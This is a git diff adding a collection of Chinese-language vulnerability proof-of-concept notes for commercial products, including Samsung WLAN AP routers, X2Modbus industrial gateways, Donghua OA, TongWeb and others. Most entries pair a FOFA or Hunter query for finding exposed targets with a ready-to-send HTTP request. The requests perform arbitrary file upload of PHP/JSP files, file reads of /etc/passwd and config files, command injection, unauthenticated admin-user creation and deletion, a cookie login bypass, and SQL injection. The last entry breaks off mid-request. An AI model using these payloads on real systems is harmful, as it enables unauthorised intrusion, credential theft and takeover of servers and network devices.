index 0000000..17330f9
--- /dev/null
+++ b/万能门店小程序管理系统onepic_uploade任意文件上传漏洞.md
@@ -0,0 +1,31 @@
+# 万能门店小程序管理系统onepic_uploade任意文件上传漏洞
+
+万能门店小程序DIY建站无限独立版非微擎应用，独立版是基于国内很火的ThinkPHP5框架开发的，适用于各行各业小程序、企业门店小程序，万能门店小程序管理系统onepic_uploade任意文件上传漏洞
+
+## fofa
+
+```javascript
+"/comhome/cases/index.html" 
+```
+
+## poc
+
+```javascript
+POST /comadmin/Remote/onepic_uploade?file=file HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBiKyL9D0p5OtH5zz
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+------WebKitFormBoundaryBiKyL9D0p5OtH5zz
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();unlink(__FILE__);?>
+------WebKitFormBoundaryBiKyL9D0p5OtH5zz--
+```
+
+![image-20241128164739396](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281647503.png)
\ No newline at end of file
diff --git a/万豪娱乐存在任意文件读取漏洞 2.md b/万豪娱乐存在任意文件读取漏洞 2.md
new file mode 100644
index 0000000..f0ca97e
--- /dev/null
+++ b/万豪娱乐存在任意文件读取漏洞 2.md	
@@ -0,0 +1,22 @@
+# 万豪娱乐存在任意文件读取漏洞
+
+# 一、漏洞简介
+万豪娱乐存在任意文件读取漏洞
+
+# <font style="color:rgb(51, 51, 51);">二、资产测绘</font>
++ fofa`"Public/Js/Mobile" && country="CN"`
++ 特征
+
+![1732603661176-cb3a2a28-7d6a-40d4-9d80-fd111ca79567.png](./img/eaMHkXnPwwFbw3wO/1732603661176-cb3a2a28-7d6a-40d4-9d80-fd111ca79567-382774.png)
+
+# 三、漏洞复现
+```plain
+/Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993
+```
+
+<font style="color:rgb(52, 73, 94);">使用poc访问后，接着访问 /public/gamelist/1993.jpg 的图片，保存下来就是读取到的内容</font>
+
+
+
+> 更新: 2024-11-27 10:00:05  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ifd65o9r8hm8m0ac>
\ No newline at end of file
diff --git a/万豪娱乐存在任意文件读取漏洞.md b/万豪娱乐存在任意文件读取漏洞.md
new file mode 100644
index 0000000..300fa2e
--- /dev/null
+++ b/万豪娱乐存在任意文件读取漏洞.md
@@ -0,0 +1,20 @@
+# 万豪娱乐存在任意文件读取漏洞
+
+万豪娱乐存在任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```javascript
+"Public/Js/Mobile" && country="CN"
+```
+
+![image-20240928131302737](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409281313798.png)
+
+## poc
+
+```javascript
+/Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993
+```
+
+**使用poc访问后，接着访问 /public/gamelist/1993.jpg 的图片，保存下来就是读取到的内容**
+
diff --git a/三星路由器WLANAP任意文件读取漏洞.md b/三星路由器WLANAP任意文件读取漏洞.md
new file mode 100644
index 0000000..66d1495
--- /dev/null
+++ b/三星路由器WLANAP任意文件读取漏洞.md
@@ -0,0 +1,32 @@
+# 三星路由器WLAN AP任意文件读取漏洞
+
+# 一、漏洞简介
+三星 WLAN AP WEA453e路由器存在任意文件读取漏洞，可在未授权的情况下获取敏感信息。
+
+# 二、影响版本
++ 三星 WLAN AP WEA453e路由器
+
+# 三、资产测绘
++ hunter`web.title="Samsung WLAN AP"`
++ 特征
+
+![1699981974720-33031d9c-1da8-4cf7-87e1-1b3f1b65341d.png](./img/MnDBMhl-Vf5EcH4Y/1699981974720-33031d9c-1da8-4cf7-87e1-1b3f1b65341d-129492.png)
+
+# 四、漏洞复现
+```plain
+GET /(download)/etc/passwd HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1699982107952-6d999eff-c332-4c61-8047-73509df4ff1b.png](./img/MnDBMhl-Vf5EcH4Y/1699982107952-6d999eff-c332-4c61-8047-73509df4ff1b-435942.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ypkfb8s12ng42izh>
\ No newline at end of file
diff --git a/三星路由器WLANAP远程命令执行漏洞.md b/三星路由器WLANAP远程命令执行漏洞.md
new file mode 100644
index 0000000..ec79050
--- /dev/null
+++ b/三星路由器WLANAP远程命令执行漏洞.md
@@ -0,0 +1,36 @@
+# 三星路由器WLAN AP 远程命令执行漏洞
+
+# 一、漏洞简介
+三星 WLAN AP WEA453e路由器存在远程命令执行漏洞，可在未授权的情况下执行任意命令获取服务器权限。
+
+# 二、影响版本
++ 三星 WLAN AP WEA453e路由器
+
+# 三、资产测绘
++ hunter`web.title="Samsung WLAN AP"`
++ 特征
+
+![1699981974720-33031d9c-1da8-4cf7-87e1-1b3f1b65341d.png](./img/WlFtd27uvNlv3_yd/1699981974720-33031d9c-1da8-4cf7-87e1-1b3f1b65341d-028838.png)
+
+# 四、漏洞复现
+```plain
+POST /(download)/tmp/a.txt HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+
+command1=shell:ls | dd of=/tmp/a.txt
+```
+
+![1699982002400-dfea75e4-b2c9-4cb8-8d27-d9045ae51bcd.png](./img/WlFtd27uvNlv3_yd/1699982002400-dfea75e4-b2c9-4cb8-8d27-d9045ae51bcd-101621.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ae6xqzhcp3o4cl3m>
\ No newline at end of file
diff --git a/三汇SMG网关管理软件SMGSuperAdmin信息泄露漏洞.md b/三汇SMG网关管理软件SMGSuperAdmin信息泄露漏洞.md
new file mode 100644
index 0000000..388ff52
--- /dev/null
+++ b/三汇SMG网关管理软件SMGSuperAdmin信息泄露漏洞.md
@@ -0,0 +1,23 @@
+# 三汇SMG网关管理软件SMGSuperAdmin信息泄露漏洞
+
+三汇SMG网关管理软件 SMGSuperAdmin 配置文件存在信息泄露漏洞，未经身份认证的攻击者可获取用户名密码等敏感信息，使系统处于极不安全状态。
+
+## fofa
+
+```javascript
+app="Synway-网关管理软件"
+```
+
+## poc
+
+```javascript
+GET /Config/SMGSuperAdmin.ini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20241211213513890](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112135943.png)
\ No newline at end of file
diff --git a/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞 2.md b/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞 2.md
new file mode 100644
index 0000000..7fee01c
--- /dev/null
+++ b/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞 2.md	
@@ -0,0 +1,23 @@
+# 上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞
+上海汉塔网络科技有限公司多年来一直专注于网络应用的软件开发，在网络安全、网络协议分析、网络数据流控制等领域有着丰富的经验和雄厚的技术实力。同时，公司积累了丰富的数据通信及网络安全产品研发、生产、销售及服务经验，是行业领先的新一代信息安全产品供应商，目前拥有上网行为管理、IPSecVPN、SSLVPN、流量控制等多款产品。上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞
+
+## fofa
+```javascript
+body="Antasys"
+```
+
+## poc
+```javascript
+GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1
+Host: 
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: PHPSESSID=515a7b9608e8a01fd03889ccf28bf590
+Upgrade-Insecure-Requests: 1
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734321123435-1f8a2319-92ab-4659-80cf-cf44cef5073a.png)
+
diff --git a/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞.md b/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞.md
new file mode 100644
index 0000000..ff12fc6
--- /dev/null
+++ b/上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞.md
@@ -0,0 +1,34 @@
+# 上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞
+
+# 一、漏洞简介
+上海汉塔网络科技有限公司多年来一直专注于网络应用的软件开发，在网络安全、网络协议分析、网络数据流控制等领域有着丰富的经验和雄厚的技术实力。同时，公司积累了丰富的数据通信及网络安全产品研发、生产、销售及服务经验，是行业领先的新一代信息安全产品供应商，目前拥有上网行为管理、IPSecVPN、SSLVPN、流量控制等多款产品。上海汉塔网络科技有限公司上网行为管理系统存在远程命令执行漏洞
+
+# 二、影响版本
++ 上海汉塔网络科技有限公司上网行为管理系统
+
+# 三、资产测绘
++ fofa`body="Antasys"`
++ 特征
+
+![1733819382185-43df4414-69c6-45b9-a210-635997768cc0.png](./img/g30UhvPbU8YEnkZ_/1733819382185-43df4414-69c6-45b9-a210-635997768cc0-368560.png)
+
+# 四、漏洞复现
+```java
+GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1
+Host: 
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: PHPSESSID=515a7b9608e8a01fd03889ccf28bf590
+Upgrade-Insecure-Requests: 1
+
+```
+
+![1734321123435-1f8a2319-92ab-4659-80cf-cf44cef5073a.png](./img/g30UhvPbU8YEnkZ_/1734321123435-1f8a2319-92ab-4659-80cf-cf44cef5073a-437220.png)
+
+
+
+> 更新: 2024-12-20 14:54:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yw165400gwggwvav>
\ No newline at end of file
diff --git a/上海迅饶自动化科技有限公司X2Modbus网关GetUserList存在敏感信息泄露.md b/上海迅饶自动化科技有限公司X2Modbus网关GetUserList存在敏感信息泄露.md
new file mode 100644
index 0000000..09df9c7
--- /dev/null
+++ b/上海迅饶自动化科技有限公司X2Modbus网关GetUserList存在敏感信息泄露.md
@@ -0,0 +1,36 @@
+# 上海迅饶自动化科技有限公司X2Modbus网关GetUserList存在敏感信息泄露
+
+# 一、漏洞简介
+X2Modbus是上海迅饶自动化科技有限公司开发的一款功能很强大的协议转换网关， 这里的X代表各家不同的通信协议， 2是To的谐音表示转换， Modbus就是最终支持的标准协议是Modbus协议。用户可以根据现场设备的通信协议进行配置，转成标准的Modbus协议。在PC端仿真运行无误后，上传到硬件协议转换网关。X2Modbus网关GetUserList接口存在一个信息泄漏漏洞，使得未经授权的用户或攻击者可以获取管理员登录信息。
+
+# 二、影响版本
++ X2Modbus
+
+# 三、资产测绘
++ fofa`server="SunFull-Webs" || icon_hash="-1384370370"`
++ 特征
+
+![1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936.png](./img/5pAm6LDi9QkvfYif/1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936-178259.png)
+
+# 四、漏洞复现
+```java
+POST /soap/GetUserList HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 56
+
+CmpWc=
+```
+
+![1712507467332-2db34223-b5c6-42d5-bd22-5afb39b57c72.png](./img/5pAm6LDi9QkvfYif/1712507467332-2db34223-b5c6-42d5-bd22-5afb39b57c72-368876.png)
+
+
+
+> 更新: 2024-04-16 16:50:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/twhz9rc6wex3xe15>
\ No newline at end of file
diff --git a/上海迅饶自动化科技有限公司X2Modbus网关GetUser存在敏感信息泄露.md b/上海迅饶自动化科技有限公司X2Modbus网关GetUser存在敏感信息泄露.md
new file mode 100644
index 0000000..55a83d6
--- /dev/null
+++ b/上海迅饶自动化科技有限公司X2Modbus网关GetUser存在敏感信息泄露.md
@@ -0,0 +1,46 @@
+# 上海迅饶自动化科技有限公司X2Modbus网关GetUser存在敏感信息泄露
+
+# 一、漏洞简介
+X2Modbus是上海迅饶自动化科技有限公司开发的一款功能很强大的协议转换网关， 这里的X代表各家不同的通信协议， 2是To的谐音表示转换， Modbus就是最终支持的标准协议是Modbus协议。用户可以根据现场设备的通信协议进行配置，转成标准的Modbus协议。在PC端仿真运行无误后，上传到硬件协议转换网关。X2Modbus网关GetUser接口存在一个信息泄漏漏洞，使得未经授权的用户或攻击者可以获取管理员登录信息。
+
+# 二、影响版本
++ X2Modbus
+
+# 三、资产测绘
++ fofa`server="SunFull-Webs" || icon_hash="-1384370370"`
++ 特征
+
+![1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936.png](./img/EVgnPN6fawjgwB7g/1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936-622823.png)
+
+# 四、漏洞复现
+```java
+POST /soap/GetUser HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 56
+
+<GetUser><User Name="admin" Password="admin"/></GetUser>
+```
+
+![1710416390196-3387ee8a-9cdd-424f-bc3e-7b2d914750c2.png](./img/EVgnPN6fawjgwB7g/1710416390196-3387ee8a-9cdd-424f-bc3e-7b2d914750c2-249481.png)
+
+登录入口
+
+```java
+/login.html
+```
+
+![1710416447837-d287970f-4360-49a1-bebc-bd4bc9354b0f.png](./img/EVgnPN6fawjgwB7g/1710416447837-d287970f-4360-49a1-bebc-bd4bc9354b0f-768042.png)
+
+[X2Modbus-getuser-info.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713257450749-41ffa537-94d2-4a1a-acf8-8d523ae4e463.yaml)
+
+
+
+> 更新: 2024-04-16 16:50:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ciccosqccoem25bz>
\ No newline at end of file
diff --git a/上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞.md b/上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞.md
new file mode 100644
index 0000000..3774fa3
--- /dev/null
+++ b/上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞.md
@@ -0,0 +1,45 @@
+# 上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞
+
+# 一、漏洞简介
+X2Modbus是上海迅饶自动化科技有限公司开发的一款功能很强大的协议转换网关， 这里的X代表各家不同的通信协议， 2是To的谐音表示转换， Modbus就是最终支持的标准协议是Modbus协议。用户可以根据现场设备的通信协议进行配置，转成标准的Modbus协议。在PC端仿真运行无误后，上传到硬件协议转换网关。上海迅饶自动化科技有限公司X2Modbus网关任意用户删除漏洞
+
+# 二、影响版本
++ X2Modbus
+
+# 三、资产测绘
++ fofa`server="SunFull-Webs" || icon_hash="-1384370370"`
++ 特征
+
+![1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936.png](./img/wPHoPD3sv_JhVtmu/1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936-219366.png)
+
+# 四、漏洞复现
+删除前账号
+
+![1712507909745-a45f3985-9d5c-40e6-939d-c770d21daee8.png](./img/wPHoPD3sv_JhVtmu/1712507909745-a45f3985-9d5c-40e6-939d-c770d21daee8-356690.png)
+
+```java
+POST /soap/DeleteUser HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: application/xml, text/xml, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: text/xml; charset=utf-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 39
+Connection: close
+Cookie: language=zh-cn; language=zh-cn
+
+delete from userid where username='stc'
+```
+
+![1712507935042-e1380807-910e-4d76-b5c7-4e2f0af05c76.png](./img/wPHoPD3sv_JhVtmu/1712507935042-e1380807-910e-4d76-b5c7-4e2f0af05c76-899725.png)
+
+删除后
+
+![1712507955869-61cca64e-db36-4d80-aaed-2f02c6bfd456.png](./img/wPHoPD3sv_JhVtmu/1712507955869-61cca64e-db36-4d80-aaed-2f02c6bfd456-979986.png)
+
+
+
+> 更新: 2024-04-16 16:50:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gqtttrccg5d19xuw>
\ No newline at end of file
diff --git a/上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞.md b/上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞.md
new file mode 100644
index 0000000..795bdb4
--- /dev/null
+++ b/上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞.md
@@ -0,0 +1,42 @@
+# 上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞
+
+# 一、漏洞简介
+X2Modbus是上海迅饶自动化科技有限公司开发的一款功能很强大的协议转换网关， 这里的X代表各家不同的通信协议， 2是To的谐音表示转换， Modbus就是最终支持的标准协议是Modbus协议。用户可以根据现场设备的通信协议进行配置，转成标准的Modbus协议。在PC端仿真运行无误后，上传到硬件协议转换网关。上海迅饶自动化科技有限公司X2Modbus网关任意用户添加漏洞
+
+# 二、影响版本
++ X2Modbus
+
+# 三、资产测绘
++ fofa`server="SunFull-Webs" || icon_hash="-1384370370"`
++ 特征
+
+![1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936.png](./img/ypZ9XWVltXmWxcJb/1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936-329773.png)
+
+# 四、漏洞复现
+```java
+POST /soap/AddUser HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
+Accept: application/xml, text/xml, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: text/xml; charset=utf-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 111
+Connection: close
+Referer: 
+Cookie: language=zh-cn; language=zh-cn
+
+insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('stc','stc123456','1','2024-4-8','0:31:43')
+```
+
+![1712507596517-ebcb5e1f-fb34-499d-8d66-6f1190d8f714.png](./img/ypZ9XWVltXmWxcJb/1712507596517-ebcb5e1f-fb34-499d-8d66-6f1190d8f714-655700.png)
+
+使用添加的账户`stc/stc`登录系统
+
+![1712507789057-5844ddbc-3b9b-4941-83bd-4af254f8508a.png](./img/ypZ9XWVltXmWxcJb/1712507789057-5844ddbc-3b9b-4941-83bd-4af254f8508a-197429.png)
+
+
+
+> 更新: 2024-04-16 16:50:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lyagwfg3rha3y0xp>
\ No newline at end of file
diff --git a/上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞.md b/上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞.md
new file mode 100644
index 0000000..20cd01f
--- /dev/null
+++ b/上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞.md
@@ -0,0 +1,27 @@
+# 上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞
+
+# 一、漏洞简介
+X2Modbus是上海迅饶自动化科技有限公司开发的一款功能很强大的协议转换网关， 这里的X代表各家不同的通信协议， 2是To的谐音表示转换， Modbus就是最终支持的标准协议是Modbus协议。用户可以根据现场设备的通信协议进行配置，转成标准的Modbus协议。在PC端仿真运行无误后，上传到硬件协议转换网关。上海迅饶自动化科技有限公司X2Modbus网关未授权访问漏洞，<font style="color:rgba(0, 0, 0, 0.9);">无需登录，直接访问后台管理首页即可获得80%的后台管理权限</font>
+
+# 二、影响版本
++ X2Modbus
+
+# 三、资产测绘
++ fofa`server="SunFull-Webs" || icon_hash="-1384370370"`
++ 特征
+
+![1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936.png](./img/Qbxicae7Ue6yATdD/1710416347834-b54d34ac-c701-4de7-aa01-4e4e7792c936-534188.png)
+
+# 四、漏洞复现
+<font style="color:rgba(0, 0, 0, 0.9);">若是复现不成功，说明增加了部分鉴权，可以在cookie增加username=admin的项也可直接绕过登录界面。</font>
+
+```java
+/index.html
+```
+
+![1712507272404-8ed88b77-7c04-4570-ab58-bf989e87d870.png](./img/Qbxicae7Ue6yATdD/1712507272404-8ed88b77-7c04-4570-ab58-bf989e87d870-492254.png)
+
+
+
+> 更新: 2024-04-16 16:50:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gls8bg23feb5hiu7>
\ No newline at end of file
diff --git a/东华医疗协同办公系统connector接口处存在任意文件上传漏洞.md b/东华医疗协同办公系统connector接口处存在任意文件上传漏洞.md
new file mode 100644
index 0000000..505d537
--- /dev/null
+++ b/东华医疗协同办公系统connector接口处存在任意文件上传漏洞.md
@@ -0,0 +1,49 @@
+# 东华医疗协同办公系统 connector接口处存在任意文件上传漏洞
+
+# 一、漏洞简介
+东华oa协同办公 (DHCIOA)选用B/S结构的作业模式，以个性化效芳的门户为基础，以消息传递、信息同享、公函、作业流处理技能为中心，以先进老练的计算机和通讯技能为首要手法，供给内部网络之间的信息沟通，有效处理、和谐各部分之间的作业，提高文件处理的精确性、及时性和科学性，为企事业/政府机关单位完成无纸化作业供给完整的软件支撑，全面提高作业效率。东华医疗协同办公系统 connector接口处存在任意文件上传漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+# 二、影响版本
++ 东华医疗协同办公系统
+
+# 三、资产测绘
++ Hunter`web.body="/skin/charmBlue/css/dialog.css"`
++ 特征
+
+![1705157130503-f3fa0a36-6d9a-4ef8-be4c-c35f8dc03239.png](./img/gO9SKq3KWNRMPZ_M/1705157130503-f3fa0a36-6d9a-4ef8-be4c-c35f8dc03239-510859.png)
+
+# 四、漏洞复现
+```http
+POST /common/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=&CurrentFolder=/ HTTP/1.1
+Host: 
+Cookie: JSESSIONID=17A17E4D9E4E38B72D650895AFF7D1DF
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt1qdEWTI01cj5BLV
+Connection: close
+Content-Length: 292
+
+------WebKitFormBoundaryt1qdEWTI01cj5BLV
+Content-Disposition: form-data; name="NewFile"; filename="stc.jsp"
+Content-Type: image/jpeg
+
+123good
+------WebKitFormBoundaryt1qdEWTI01cj5BLV
+Content-Disposition: form-data; name="Submit"
+
+upload
+------WebKitFormBoundaryt1qdEWTI01cj5BLV--
+```
+
+![1705157687374-29e624d3-24b5-4052-a3b7-9c8c877a6e28.png](./img/gO9SKq3KWNRMPZ_M/1705157687374-29e624d3-24b5-4052-a3b7-9c8c877a6e28-024117.png)
+
+上传文件位置
+
+```http
+/common/FCKeditor/UserFiles/stc.jsp
+```
+
+![1705157714589-d5cc4aa8-dc1b-42db-9589-640aba4960d2.png](./img/gO9SKq3KWNRMPZ_M/1705157714589-d5cc4aa8-dc1b-42db-9589-640aba4960d2-666968.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yc0w19lqn3qt4ege>
\ No newline at end of file
diff --git a/东华医疗协同办公系统templateFile存在任意文件下载漏洞.md b/东华医疗协同办公系统templateFile存在任意文件下载漏洞.md
new file mode 100644
index 0000000..ce7011c
--- /dev/null
+++ b/东华医疗协同办公系统templateFile存在任意文件下载漏洞.md
@@ -0,0 +1,19 @@
+# 东华医疗协同办公系统templateFile存在任意文件下载漏洞
+
+东华医疗协同办公系统 templateFile 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```yaml
+body="东华医疗协同办公系统"
+```
+
+## poc
+
+```java
+GET /common/templateFile?template_name=../../WEB-INF/web.xml HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408162053596.png)
\ No newline at end of file
diff --git a/东方通upload接口存在任意文件上传漏洞.md b/东方通upload接口存在任意文件上传漏洞.md
new file mode 100644
index 0000000..0ee72e8
--- /dev/null
+++ b/东方通upload接口存在任意文件上传漏洞.md
@@ -0,0 +1,37 @@
+# 东方通upload接口存在任意文件上传漏洞
+
+东方通upload接口存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+header="TongWeb Server" || banner="Server: TongWeb Server"
+```
+
+## poc
+
+```javascript
+POST /heimdall/deploy/upload?method=upload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
+Connection: keep-alive
+Content-Length: 396
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
+
+------WebKitFormBoundary8UaANmWAgM4BqBSsContent-Disposition: form-data; name="file"; filename="../../applications/console/css/12462332j12.jsp"
+
+123456
+------WebKitFormBoundary8UaANmWAgM4BqBSs--
+```
+
+文件路径`/console/css/12462332j12.jsp`
+
+![3defeacdea561cbf5f9437781d48707d](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409251124922.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/5YXeW7rlQ17Kz-6MvrzzKA
\ No newline at end of file
diff --git a/东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞.md b/东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..3324ff5
--- /dev/null
+++ b/东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+## 东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞
+
+东胜物流软件AttributeAdapter.aspx存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息。
+
+## fofa
+
+```javascript
+body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"
+```
+
+## poc
+
+```javascript
+GET /FeeCodes/AttributeAdapter.aspx?handle=attrinfo&attrid=1%27%20and%201=@@version%20-- HTTP/1.1
+Host: 
